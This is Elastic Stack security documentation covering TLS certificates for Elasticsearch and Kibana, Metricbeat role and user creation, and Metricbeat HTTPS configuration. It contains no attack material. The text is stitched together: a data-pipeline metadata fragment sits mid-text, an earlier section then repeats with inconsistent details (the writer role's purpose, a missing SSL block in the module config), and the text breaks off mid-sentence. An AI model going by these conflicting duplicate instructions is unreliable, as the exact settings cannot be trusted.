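\nA minimal sketch of what those prefixed settings can look like in `kibana.yml` (the monitoring host and truststore path here are assumed placeholders for your environment):\n\n[source,yaml]\n----\nmonitoring.ui.elasticsearch.hosts: [\"https:\/\/<your_monitoring_host>:9200\"]\nmonitoring.ui.elasticsearch.ssl.truststore.path: KBN_PATH_CONF\/monitoring-http.p12\n----\n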
For example, `monitoring.ui.elasticsearch.hosts` and\n`monitoring.ui.elasticsearch.ssl.truststore.path`.\n\nNOTE: You must create a separate `elasticsearch-ca.pem` security file for the\nmonitoring cluster.\n****\n\n**Next**: <<encrypt-kibana-browser,Encrypt traffic between your browser and {kib}>>\n\n[[encrypt-kibana-browser]]\n===== Encrypt traffic between your browser and {kib}\n\nYou create a server certificate and private key for {kib}. {kib} uses this\nserver certificate and corresponding private key when receiving connections\nfrom web browsers.\n\nWhen you obtain a server certificate, you must set its subject alternative\nname (SAN) correctly to ensure that browsers will trust it. You can set one or\nmore SANs to the {kib} server\u2019s fully-qualified domain name (FQDN), hostname,\nor IP address. When choosing the SAN, pick whichever attribute you'll use to\nconnect to {kib} in your browser, which is likely the FQDN.\n\nThe following instructions create a Certificate Signing Request (CSR) for {kib}.\nA CSR contains information that a CA uses to generate and sign a security\ncertificate. The certificate can be trusted (signed by a public, trusted CA)\nor untrusted (signed by an internal CA). A self-signed or internally-signed\ncertificate is acceptable for development environments and building a proof of\nconcept, but should not be used in a production environment.\n\nWARNING: Before going to production, use a trusted CA such as https:\/\/letsencrypt.org\/[Let's\nEncrypt] or your organization's internal CA to sign the certificate. Using a\nsigned certificate establishes browser trust for connections to {kib} for\ninternal access or on the public internet.\n\n. Generate a server certificate and private key for {kib}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil csr -name kibana-server -dns example.com,www.example.com\n----\n+\nThe CSR has a common name (CN) of `kibana-server`, a SAN of `example.com`,\nand another SAN of `www.example.com`.\n+\nThis command generates a `csr-bundle.zip` file by default with the following\ncontents:\n+\n[source,txt]\n----\n\/kibana-server\n|_ kibana-server.csr\n|_ kibana-server.key\n----\n\n. Unzip the `csr-bundle.zip` file to obtain the `kibana-server.csr` unsigned\nsecurity certificate and the `kibana-server.key` unencrypted private key.\n\n. Send the `kibana-server.csr` certificate signing request to your internal\nCA or trusted CA for signing to obtain a signed certificate. The signed file\ncan be in different formats, such as a `.crt` file like `kibana-server.crt`.\n\n. Open `kibana.yml` and add the following lines to configure {kib} to access\nthe server certificate and unencrypted private key.\n+\n[source,yaml]\n----\nserver.ssl.certificate: KBN_PATH_CONF\/kibana-server.crt\nserver.ssl.key: KBN_PATH_CONF\/kibana-server.key\n----\n+\nNOTE: `KBN_PATH_CONF` contains the path for the {kib} configuration files. If\nyou installed {kib} using archive distributions (`zip` or `tar.gz`), the\npath defaults to `KBN_HOME\/config`. If you used package distributions\n(Debian or RPM), the path defaults to `\/etc\/kibana`.\n\n. Add the following line to `kibana.yml` to enable TLS for inbound\nconnections.\n+\n[source,yaml]\n----\nserver.ssl.enabled: true\n----\n\n. Start {kib}.\n\nNOTE: After making these changes, you must always access {kib} via HTTPS. 
For\nexample, `https:\/\/<your_kibana_host>.com`.\n\n**Next**: <<configure-beats-security,Configure {beats} security>>\n\n[[configure-beats-security]]\n==== Configure {beats} security\n\nThe {beats} are open source data shippers that you install as agents on your\nservers to send operational data to {es}. Each Beat is a separately\ninstallable product. The following steps cover configuring security for\n{metricbeat}. Follow these steps for each https:\/\/www.elastic.co\/guide\/en\/elastic-stack-get-started\/7.9\/get-started-elastic-stack.html#install-beats[additional Beat] you want to configure security for.\n\n===== Prerequisites\n\nhttps:\/\/www.elastic.co\/guide\/en\/beats\/metricbeat\/7.9\/metricbeat-installation-configuration.html[Install {metricbeat}] using your preferred method.\n\nNOTE: You cannot connect to the Elastic Stack or set up assets for {metricbeat}\nbefore completing the following steps.\n\n===== Create roles for {metricbeat}\n\nTypically, you need to create the following separate roles:\n\n- **setup** role for setting up index templates and other dependencies\n- **monitoring** role for sending monitoring information\n- **writer** role for publishing events collected by {metricbeat}\n- **reader** role for {kib} users who need to view and create visualizations that access {metricbeat} data\n\nNOTE: These instructions assume that you are using the default name for\n{metricbeat} indices. If the indicated index names are not listed, or you are\nusing a custom name, enter it manually when defining roles and modify the\nprivileges to match your index naming pattern.\n\nTo create users and roles from Stack Management in {kib}, select **Roles**\nor **Users** from the side navigation.\n\n**Next**: <<beats-setup-role,Create a setup role>>\n\n[discrete]\n[[beats-setup-role]]\n====== Create a setup role and user\n\nAdministrators who set up {metricbeat} typically need to load mappings,\ndashboards, and other objects used to index data into {es} and visualize it in\n{kib}.\n\nWARNING: Setting up {metricbeat} is an admin-level task that requires extra\nprivileges. As a best practice, grant the setup role to administrators only,\nand use a more restrictive role for event publishing.\n\n1. Create the setup role:\n\n a. Enter **metricbeat_setup** as the role name.\n\n b. Choose the **monitor** and **manage_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **manage** and **write**\n privileges.\n+\nIf the **metricbeat-\\*** indices aren't listed, enter that pattern into the\nlist of indices.\n\n2. Create the setup user:\n\n a. Enter **metricbeat_setup** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_setup** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_setup` | Set up {metricbeat}\n| `kibana_admin` | Load dependencies, such as example dashboards, if available, into {kib}\n| `ingest_admin` | Set up index templates and, if available, ingest pipelines\n| `beats_admin` | Enroll and manage configurations in {beats} central management\n|===\n
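\nRather than clicking through Stack Management, the same role can also be created with the {es} role management API; a sketch with `curl` (host, credentials, and CA file are placeholders for your environment):\n\n[source,shell]\n----\ncurl -u elastic --cacert elasticsearch-ca.pem \\\n  -X POST \"https:\/\/<your_elasticsearch_host>:9200\/_security\/role\/metricbeat_setup\" \\\n  -H \"Content-Type: application\/json\" -d'\n{\n  \"cluster\": [\"monitor\", \"manage_ilm\"],\n  \"indices\": [\n    { \"names\": [\"metricbeat-*\"], \"privileges\": [\"manage\", \"write\"] }\n  ]\n}'\n----\n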
\n**Next**: <<beats-monitoring-role,Create a monitoring role>>\n\n[discrete]\n[[beats-monitoring-role]]\n====== Create a monitoring role and user\n\nTo send monitoring data securely, create a monitoring user and grant it the\nnecessary privileges.\n\nYou can use the built-in `beats_system` user, if it\u2019s available in your\nenvironment. Because the built-in users are not available in Elastic Cloud,\nthese instructions create a user that is explicitly used for monitoring\n{metricbeat}.\n\n1. Create the monitoring role:\n\n a. Enter **metricbeat_monitoring** as the role name.\n\n b. Choose the **monitor** cluster privilege.\n\n c. On the **.monitoring-beats-\\*** indices, choose the **create_index** and\n **create_doc** privileges.\n\n2. Create the monitoring user:\n\n a. Enter **metricbeat_monitoring** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_monitoring** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_monitoring` | Monitor {metricbeat}\n| `kibana_admin` | Use {kib}\n| `monitoring_user` | Use Stack Monitoring in {kib} to monitor {metricbeat}\n|===\n\n**Next**: <<beats-writer-role,Create a writer role>>\n\n[discrete]\n[[beats-writer-role]]\n====== Create a writer role and user\n\nUsers who publish events to {es} need to create and write to {metricbeat} indices. To minimize the privileges required by the writer role, use the setup role to pre-load dependencies. This section assumes that you\u2019ve\n<<beats-setup-role,created the setup role>>.\n\n1. Create the writer role:\n\n a. Enter **metricbeat_writer** as the role name.\n\n b. Choose the **monitor** and **read_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **create_doc**, **create_index**, and **view_index_metadata** privileges.\n\n2. Create the writer user:\n\n a. Enter **metricbeat_writer** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_writer** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_writer` | Publish events collected by {metricbeat}\n| `remote_monitoring_collector` | Collect monitoring metrics from {metricbeat}\n| `remote_monitoring_agent` | Send monitoring data to the monitoring cluster\n|===\n\n**Next**: <<beats-reader-role,Create a reader role>>\n\n[discrete]\n[[beats-reader-role]]\n====== Create a reader role and user\n\n{kib} users typically need to view dashboards and visualizations that contain\n{metricbeat} data. These users might also need to create and edit dashboards\nand visualizations. Create the reader role to assign proper privileges to these\nusers.\n\n1. Create the reader role:\n\n a. Enter **metricbeat_reader** as the role name.\n\n b. On the **metricbeat-\\*** indices, choose the **read** privilege.\n\n c. Under **Kibana**, click **Add Kibana privilege**.\n\n - Under **Spaces**, choose **Default**.\n\n - Choose **Read** or **All** for Discover, Visualize, Dashboard, and Metrics.\n\n2. Create the reader user:\n\n a. Enter **metricbeat_reader** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_reader** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_reader` | Read {metricbeat} data\n| `monitoring_user` | Allow users to monitor the health of {metricbeat}\nitself. Only assign this role to users who manage {metricbeat}\n| `beats_admin` | Create and manage configurations in {beats} central\nmanagement. Only assign this role to users who need to use {beats} central\nmanagement\n|===\n
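\nThe corresponding users can likewise be created through the {es} user management API instead of the UI; a sketch for the writer user (host, credentials, and password are placeholders):\n\n[source,shell]\n----\ncurl -u elastic --cacert elasticsearch-ca.pem \\\n  -X POST \"https:\/\/<your_elasticsearch_host>:9200\/_security\/user\/metricbeat_writer\" \\\n  -H \"Content-Type: application\/json\" -d'\n{\n  \"password\": \"<password>\",\n  \"roles\": [\"metricbeat_writer\", \"remote_monitoring_collector\", \"remote_monitoring_agent\"]\n}'\n----\n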
\n**Next**: <<configure-metricbeat-tls,Configure {metricbeat} to use TLS>>\n\n[discrete]\n[[configure-metricbeat-tls]]\n===== Configure {metricbeat} to use TLS\n\nBefore starting {metricbeat}, you configure the connections to {es} and\n{kib}. You can configure authentication to send data to your secured cluster\nusing basic authentication, API key authentication, or Public Key\nInfrastructure (PKI) certificates.\n\nThe following instructions use the credentials for the `metricbeat_writer`\nand `metricbeat_setup` users that you created. If you need a greater level of\nsecurity, we recommend using PKI certificates.\n\nAfter configuring connections to {es} and {kib}, you'll enable the\n`elasticsearch-xpack` module and configure that module to use HTTPS.\n\nWARNING: In production environments, we strongly recommend using a separate\ncluster (referred to as the monitoring cluster) to store your data. Using a\nseparate monitoring cluster prevents production cluster outages from impacting\nyour ability to access your monitoring data. It also prevents monitoring\nactivities from impacting the performance of your production cluster.\n\n. From the directory where you installed Elasticsearch, navigate to the\n`\/kibana` directory that you created when <<encrypt-http-communication,encrypting HTTP client communications for {es}>>.\n\n. Copy the `elasticsearch-ca.pem` certificate to the directory where you\ninstalled {metricbeat}.\n\n. Open the `metricbeat.yml` configuration file and configure the connection\nto {es}.\n+\nUnder `output.elasticsearch`, specify the following fields:\n+\n[source,yaml]\n----\noutput.elasticsearch:\n hosts: [\"<your_elasticsearch_host>:9200\"]\n protocol: \"https\"\n username: \"metricbeat_writer\"\n password: \"<password>\"\n ssl:\n certificate_authorities: [\"elasticsearch-ca.pem\"]\n verification_mode: \"certificate\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n\n `protocol`:: Indicates the protocol to use when connecting to Elasticsearch.\n This value must be `https`.\n\n `username`:: Name of the user with privileges required to publish events to\n Elasticsearch. The `metricbeat_writer` user that you created has these\n privileges.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to the local `.pem` file that\n contains your CA's certificate. \n\n. Configure the connection to {kib}.\n+\nUnder `setup.kibana`, specify the following fields:\n+\n[source,yaml]\n----\nsetup.kibana:\n host: \"https:\/\/<your_kibana_host>:5601\"\n ssl.enabled: true\n username: \"metricbeat_setup\"\n password: \"<password>\"\n----\n\n `host`:: The URL of the {kib} instance to use for setup. Ensure that you\n include `https` and the port in the URL.\n\n `username`:: Name of the user with privileges required to set up dashboards in {kib}. The `metricbeat_setup` user that you created has these privileges.\n\n `password`:: Password for the indicated `username`.\n\n. Enable the `elasticsearch-xpack` module.\n+\n[source,shell]\n----\n.\/metricbeat modules enable elasticsearch-xpack\n----\n
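\nBefore wiring up the module, you can sanity-check the configuration so far; recent {metricbeat} versions ship `test` subcommands for this (treat the exact output as version-dependent):\n\n[source,shell]\n----\n.\/metricbeat test config   # validates the metricbeat.yml syntax\n.\/metricbeat test output   # attempts a connection to Elasticsearch, including the TLS handshake\n----\n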
\n. Modify the `elasticsearch-xpack` module to use HTTPS. This module collects\nmetrics about {es}.\n+\nOpen `\/modules.d\/elasticsearch-xpack.yml` and specify the following fields:\n+\n[source,yaml]\n----\n- module: elasticsearch\n xpack.enabled: true\n period: 10s\n hosts: [\"https:\/\/<your_elasticsearch_host>:9200\"]\n username: \"remote_monitoring_user\"\n password: \"<password>\"\n ssl: <1>\n enabled: true\n certificate_authorities: [\"elasticsearch-ca.pem\"]\n verification_mode: \"certificate\"\n----\n<1> Configuring SSL is required when monitoring a node with encrypted traffic.\nSee {metricbeat-ref}\/configuration-ssl.html[Configure SSL for {metricbeat}].\n\n `hosts`:: Specifies the host where your {es} cluster is running.\n Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges to collect metric data. The\n built-in `monitoring_user` user has these privileges. Alternatively,\n you can create a user and assign it the `monitoring_user` role.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to the local `.pem` file that\n contains your CA's certificate. \n\n. If you want to use the predefined assets for parsing, indexing, and\n visualizing your data, run the following command to load these assets:\n+\n[source,shell]\n----\n.\/metricbeat setup -e\n----\n\n. Start Elasticsearch, and then start Metricbeat.\n+\n[source,shell]\n----\n.\/metricbeat -e\n----\n+\n`-e` is optional and sends output to standard error instead of the configured\nlog output.\n\n. Log in to Kibana, open the main menu, and click **Stack Monitoring**.\n+\nYou\u2019ll see cluster alerts that require your attention and a summary of the available monitoring metrics for Elasticsearch. Click any of the header links on the available cards to view additional information.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
Infrastructure within your organization\nmight already be configured to trust an existing CA, so it may be easier\nfor clients to connect to {es} if you use a CSR and send that\nrequest to the team that controls your CA. To use a central CA, answer `y` to\nthe first question.\n****\n\n[[basic-setup-https-prerequisites]]\n==== Prerequisites\n\nComplete all steps in <<security-basic-setup,Set up basic security for the Elastic Stack>>.\n\n[[encrypt-http-communication]]\n==== Encrypt HTTP client communications for {es}\n\n. Stop {es} and {kib} if they are running.\n\n. From the directory where you installed {es}, run the {es}\n HTTP certificate tool to generate a Certificate Signing Request (CSR).\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil http\n----\n+\nThis command generates a `.zip` file that contains certificates and keys\nto use with {es} and {kib}. Each folder contains a `README.txt`\nexplaining how to use these files.\n\n a. When asked if you want to generate a CSR, enter `n`.\n\n b. When asked if you want to use an existing CA, enter `y`.\n\n c. Enter the path to your CA. This is the absolute path to\n the `elastic-stack-ca.p12` file that you generated for your cluster.\n\n d. Enter the password for your CA.\n\n e. Enter an expiration value for your certificate. You can enter the\n validity period in years, months, or days. For example, enter `90D` for 90\n days.\n\n f. When asked if you want to generate one certificate per node, enter `y`.\n+\nEach certificate will have its own private key, and will be issued for a\nspecific hostname or IP address.\n\n g. When prompted, enter the name of the first node in your cluster. Use the same node name that you used when <<generate-certificates,generating node certificates>>.\n\n h. Enter all hostnames used to connect to your first node. These hostnames\n will be added as DNS names in the Subject Alternative Name (SAN) field in your certificate.\n+\nList every hostname and variant used to connect to your cluster over HTTPS.\n\n i. Enter the IP addresses that clients can use to connect to your node.\n\n j. Repeat these steps for each additional node in your cluster.\n\n. After generating a certificate for each of your nodes, enter a password for\n your private key when prompted.\n\n. Unzip the generated `elasticsearch-ssl-http.zip` file. This compressed file\n contains one directory for both {es} and {kib}.\n+\n--\n[source,txt]\n----\n\/elasticsearch\n|_ README.txt\n|_ http.p12\n|_ sample-elasticsearch.yml\n----\n\n[source,txt]\n----\n\/kibana\n|_ README.txt\n|_ elasticsearch-ca.pem\n|_ sample-kibana.yml\n----\n--\n\n. Copy the relevant `http.p12` certificate to the `ES_PATH_CONF` directory on each node.\n\n. On each node, edit the `elasticsearch.yml` file to enable HTTPS security and\n specify the location of the `http.p12` security certificate.\n+\n[source,yaml]\n----\nxpack.security.http.ssl.enabled: true\nxpack.security.http.ssl.keystore.path: http.p12\n----\n\n. Add the password for your private key to the secure settings in {es}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-keystore add xpack.security.http.ssl.keystore.secure_password\n----\n\n. Start {es}.\n\n**Next**: <<encrypt-kibana-http,Encrypt HTTP client communications for {kib}>>\n\n[[encrypt-kibana-http]]\n==== Encrypt HTTP client communications for {kib}\n\nBrowsers send traffic to {kib} and {kib} sends traffic to {es}.\nThese communication channels are configured separately to use TLS. 
You encrypt\ntraffic between your browser and {kib}, and then encrypt traffic between\n{kib} and {es}.\n\n[[encrypt-kibana-elasticsearch]]\n===== Encrypt traffic between {kib} and {es}\n\nWhen you ran the `elasticsearch-certutil` tool with the `http` option, it\ncreated a `\/kibana` directory containing an `elasticsearch-ca.pem` file. You\nuse this file to configure {kib} to trust the {es} CA for the HTTP\nlayer.\n\n1. Copy the `elasticsearch-ca.pem` file to the {kib} configuration directory,\nas defined by the `KBN_PATH_CONF` path.\n\n2. Open `kibana.yml` and add the following line to specify the location of the\nsecurity certificate for the HTTP layer.\n+\n[source,yaml]\n----\nelasticsearch.ssl.certificateAuthorities: KBN_PATH_CONF\/elasticsearch-ca.pem\n----\n\n3. Add the following line to specify the HTTPS URL for your {es}\ncluster.\n+\n[source,yaml]\n----\nelasticsearch.hosts: https:\/\/<your_elasticsearch_host>.com:9200\n----\n\n4. Restart {kib}.\n\n.Connect to a secure monitoring cluster\n****\nIf the Elastic monitoring features are enabled and you configured a separate\n{es} monitoring cluster, you can also configure {kib} to connect to\nthe monitoring cluster via HTTPS. The steps are the same, but each setting is\nprefixed by `monitoring`. For example, `monitoring.ui.elasticsearch.hosts` and\n`monitoring.ui.elasticsearch.ssl.truststore.path`.\n\nNOTE: You must create a separate `elasticsearch-ca.pem` security file for the\nmonitoring cluster.\n****\n\n**Next**: <<encrypt-kibana-browser,Encrypt traffic between your browser and {kib}>>\n\n[[encrypt-kibana-browser]]\n===== Encrypt traffic between your browser and {kib}\n\nYou create a server certificate and private key for {kib}. {kib} uses this\nserver certificate and corresponding private key when receiving connections\nfrom web browsers.\n\nWhen you obtain a server certificate, you must set its subject alternative\nname (SAN) correctly to ensure that browsers will trust it. You can set one or\nmore SANs to the {kib} server\u2019s fully-qualified domain name (FQDN), hostname,\nor IP address. When choosing the SAN, pick whichever attribute you'll use to\nconnect to {kib} in your browser, which is likely the FQDN.\n\nThe following instructions create a Certificate Signing Request (CSR) for {kib}.\nA CSR contains information that a CA uses to generate and sign a security\ncertificate. The certificate can be trusted (signed by a public, trusted CA)\nor untrusted (signed by an internal CA). A self-signed or internally-signed\ncertificate is acceptable for development environments and building a proof of\nconcept, but should not be used in a production environment.\n\nWARNING: Before going to production, use a trusted CA such as https:\/\/letsencrypt.org\/[Let's\nEncrypt] or your organization's internal CA to sign the certificate. Using a\nsigned certificate establishes browser trust for connections to {kib} for\ninternal access or on the public internet.\n\n. Generate a server certificate and private key for {kib}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil csr -name kibana-server -dns example.com,www.example.com\n----\n+\nThe CSR has a common name (CN) of `kibana-server`, a SAN of `example.com`,\nand another SAN of `www.example.com`.\n+\nThis command generates a `csr-bundle.zip` file by default with the following\ncontents:\n+\n[source,txt]\n----\n\/kibana-server\n|_ kibana-server.csr\n|_ kibana-server.key\n----\n\n. 
Unzip the `csr-bundle.zip` file to obtain the `kibana-server.csr` unsigned\nsecurity certificate and the `kibana-server.key` unencrypted private key.\n\n. Send the `kibana-server.csr` certificate signing request to your internal\nCA or trusted CA for signing to obtain a signed certificate. The signed file\ncan be in different formats, such as a `.crt` file like `kibana-server.crt`.\n\n. Open `kibana.yml` and add the following lines to configure {kib} to access\nthe server certificate and unencrypted private key.\n+\n[source,yaml]\n----\nserver.ssl.certificate: KBN_PATH_CONF\/kibana-server.crt\nserver.ssl.key: KBN_PATH_CONF\/kibana-server.key\n----\n+\nNOTE: `KBN_PATH_CONF` contains the path for the {kib} configuration files. If\nyou installed {kib} using archive distributions (`zip` or `tar.gz`), the\npath defaults to `KBN_HOME\/config`. If you used package distributions\n(Debian or RPM), the path defaults to `\/etc\/kibana`.\n\n. Add the following line to `kibana.yml` to enable TLS for inbound\nconnections.\n+\n[source,yaml]\n----\nserver.ssl.enabled: true\n----\n\n. Start {kib}.\n\nNOTE: After making these changes, you must always access {kib} via HTTPS. For\nexample, `https:\/\/<your_kibana_host>.com`.\n\n**Next**: <<configure-beats-security,Configure {beats} security>>\n\n[[configure-beats-security]]\n==== Configure {beats} security\n\nThe {beats} are open source data shippers that you install as agents on your\nservers to send operational data to {es}. Each Beat is a separately\ninstallable product. The following steps cover configuring security for\n{metricbeat}. Follow these steps for each https:\/\/www.elastic.co\/guide\/en\/elastic-stack-get-started\/7.9\/get-started-elastic-stack.html#install-beats[additional Beat] you want to configure security for.\n\n===== Prerequisites\n\nhttps:\/\/www.elastic.co\/guide\/en\/beats\/metricbeat\/7.9\/metricbeat-installation-configuration.html[Install {metricbeat}] using your preferred method.\n\nNOTE: You cannot connect to the Elastic Stack or set up assets for {metricbeat}\nbefore completing the following steps.\n\n===== Create roles for {metricbeat}\nTypically, you need to create the following separate roles:\n\n- **setup** role for setting up index templates and other dependencies\n- **monitoring** role for sending monitoring information\n- **writer** role for publishing events collected by Metricbeat\n- **reader** role for Kibana users who need to view and create visualizations that access Metricbeat data\n\nNOTE: These instructions assume that you are using the default name for\n{metricbeat} indices. If the indicated index names are not listed, or you are\nusing a custom name, enter it manually when defining roles and modify the\nprivileges to match your index naming pattern.\n\nTo create users and roles from Stack Management in {kib}, select **Roles**\nor **Users** from the side navigation.\n\n**Next**: <<beats-setup-role,Create a setup role>>\n\n[discrete]\n[[beats-setup-role]]\n====== Create a setup role and user\n\nAdministrators who set up {metricbeat} typically need to load mappings,\ndashboards, and other objects used to index data into {es} and visualize it in\n{kib}.\n\nWARNING: Setting up {metricbeat} is an admin-level task that requires extra\nprivileges. As a best practice, grant the setup role to administrators only,\nand use a more restrictive role for event publishing.\n\n1. Create the setup role:\n\n a. Enter **metricbeat_setup** as the role name.\n\n b. Choose the **monitor** and **manage_ilm** cluster privileges.\n\n c. 
On the **metricbeat-\\*** indices, choose the **manage** and **write**\n privileges.\n+\nIf the **metricbeat-\\*** indices aren't listed, enter that pattern into the\nlist of indices.\n\n2. Create the setup user:\n\n a. Enter **metricbeat_setup** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_setup** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_setup` | Set up {metricbeat}.\n| `kibana_admin` | Load dependencies, such as example dashboards, if available, into {kib}\n| `ingest_admin` | Set up index templates and, if available, ingest pipelines\n| `beats_admin` | Enroll and manage configurations in {beats} central management\n|===\n\n**Next**: <<beats-monitoring-role,Create a monitoring role>>\n\n[discrete]\n[[beats-monitoring-role]]\n====== Create a monitoring role and user\n\nTo send monitoring data securely, create a monitoring user and grant it the\nnecessary privileges.\n\nYou can use the built-in `beats_system` user, if it\u2019s available in your\nenvironment. Because the built-in users are not available in Elastic Cloud,\nthese instructions create a user that is explicitly used for monitoring\n{metricbeat}.\n\n1. Create the monitoring role:\n\n a. Enter **metricbeat_monitoring** as the role name.\n\n b. Choose the **monitor** cluster privilege.\n\n c. On the **.monitoring-beats-\\*** indices, choose the **create_index** and\n **create_doc** privileges.\n\n2. Create the monitoring user:\n\n a. Enter **metricbeat_monitoring** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_monitoring** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_monitoring` | Monitor {metricbeat}.\n| `kibana_admin` | Use {kib}\n| `monitoring_user` | Use Stack Monitoring in {kib} to monitor {metricbeat}\n|===\n\n**Next**: <<beats-writer-role,Create a writer role>>\n\n[discrete]\n[[beats-writer-role]]\n====== Create a writer role and user\n\nUsers who publish events to {es} need to create and write to {metricbeat} indices. To minimize the privileges required by the writer role, use the setup role to pre-load dependencies. This section assumes that you\u2019ve\n<<beats-setup-role,created the setup role>>.\n\n1. Create the writer role:\n\n a. Enter **metricbeat_writer** as the role name.\n\n b. Choose the **monitor** and **read_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **create_doc**, **create_index**, and **view_index_metadata** privileges.\n\n2. Create the writer user:\n\n a. Enter **metricbeat_writer** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_writer** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_writer` | Monitor {metricbeat}\n| `remote_monitoring_collector` | Collect monitoring metrics from {metricbeat}\n| `remote_monitoring_agent` | Send monitoring data to the monitoring cluster\n|===\n\n**Next**: <<beats-reader-role,Create a reader role>>\n\n[discrete]\n[[beats-reader-role]]\n====== Create a reader role and user\n\n{kib} users typically need to view dashboards and visualizations that contain\n{metricbeat} data. These users might also need to create and edit dashboards\nand visualizations. Create the reader role to assign proper privileges to these\nusers.\n\n1. Create the reader role:\n\n a. Enter **metricbeat_reader** as the role name.\n\n b. 
On the **metricbeat-\\*** indices, choose the **read** privilege.\n\n c. Under **Kibana**, click **Add Kibana privilege**.\n\n - Under **Spaces**, choose **Default**.\n\n - Choose **Read** or **All** for Discover, Visualize, Dashboard, and Metrics.\n\n2. Create the reader user:\n\n a. Enter **metricbeat_reader** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_reader** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_reader` | Read {metricbeat} data.\n| `monitoring_user` | Allow users to monitor the health of {metricbeat}\nitself. Only assign this role to users who manage {metricbeat}\n| `beats_admin` | Create and manage configurations in {beats} central\nmanagement. Only assign this role to users who need to use {beats} central\nmanagement.\n|===\n\n**Next**: <<configure-metricbeat-tls,Configure {metricbeat} to use TLS>>\n\n[discrete]\n[[configure-metricbeat-tls]]\n===== Configure {metricbeat} to use TLS\n\nBefore starting {metricbeat}, you configure the connections to {es} and\nKibana. You can configure authentication to send data to your secured cluster\nusing basic authentication, API key authentication, or Public Key\nInfrastructure (PKI) certificates.\n\nThe following instructions use the credentials for the `metricbeat_writer`\nand `metricbeat_setup` users that you created. If you need a greater level of\nsecurity, we recommend using PKI certificates.\n\nAfter configuring connections to Elasticsearch and Kibana, you'll enable the\n`elasticsearch-xpack` module and configure that module to use HTTPS.\n\nWARNING: In production environments, we strongly recommend using a separate\ncluster (referred to as the monitoring cluster) to store your data. Using a\nseparate monitoring cluster prevents production cluster outages from impacting\nyour ability to access your monitoring data. It also prevents monitoring\nactivities from impacting the performance of your production cluster.\n\n. From the directory where you installed Elasticsearch, navigate to the\n`\/kibana` directory that you created when <<encrypt-http-communication,encrypting HTTP client communications for {es}>>.\n\n. Copy the `elasticsearch-ca.pem` certificate to the directory where you\ninstalled Metricbeat.\n\n. Open the `metricbeat.yml` configuration file and configure the connection\nto Elasticsearch.\n+\nUnder `output.elasticsearch`, specify the following fields:\n+\n[source,yaml]\n----\noutput.elasticsearch:\n  hosts: [\"<your_elasticsearch_host>:9200\"]\n  protocol: \"https\"\n  username: \"metricbeat_writer\"\n  password: \"<password>\"\n  ssl:\n    certificate_authorities: [\"elasticsearch-ca.pem\"]\n    verification_mode: \"certificate\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n\n `protocol`:: Indicates the protocol to use when connecting to Elasticsearch.\n This value must be `https`.\n\n `username`:: Name of the user with privileges required to publish events to\n Elasticsearch. The `metricbeat_writer` user that you created has these\n privileges.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to your trusted CA.\n\n. 
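Optionally, test the Elasticsearch output settings before continuing (an optional aside; `.\/metricbeat test output` checks the `output.elasticsearch` settings against the live cluster):\n+\n[source,shell]\n----\n.\/metricbeat test output\n----\n\n. 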
Configure the connection to Kibana.\n+\nUnder `setup.kibana`, specify the following fields:\n+\n[source,yaml]\n----\nsetup.kibana:\n  host: \"https:\/\/<your_kibana_host>:5601\"\n  ssl.enabled: true\n  username: \"metricbeat_setup\"\n  password: \"<password>\"\n----\n\n `host`:: The URL of the Kibana instance to connect to. Ensure that you\n include `https` in the URL.\n\n `username`:: Name of the user with privileges required to set up dashboards in Kibana. The `metricbeat_setup` user that you created has these privileges.\n\n `password`:: Password for the indicated `username`.\n\n. Enable the `elasticsearch-xpack` module.\n+\n[source,shell]\n----\n.\/metricbeat modules enable elasticsearch-xpack\n----\n\n. Modify the `elasticsearch-xpack` module to use HTTPS.\n+\nOpen `\/modules.d\/elasticsearch-xpack.yml` and specify the following fields:\n+\n[source,yaml]\n----\n- module: elasticsearch\n  xpack.enabled: true\n  period: 10s\n  hosts: [\"https:\/\/<your_elasticsearch_host>:9200\"]\n  username: \"remote_monitoring_user\"\n  password: \"<password>\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges to collect metric data. The\n built-in `remote_monitoring_user` user has these privileges. Alternatively,\n you can create a user and assign it the `monitoring_user` role.\n\n `password`:: Password for the indicated `username`.\n\n. If you want to use the predefined assets for parsing, indexing, and\n visualizing your data, run the following command to load these assets:\n+\n[source,shell]\n----\n.\/metricbeat setup -e\n----\n\n. Start Elasticsearch, and then start 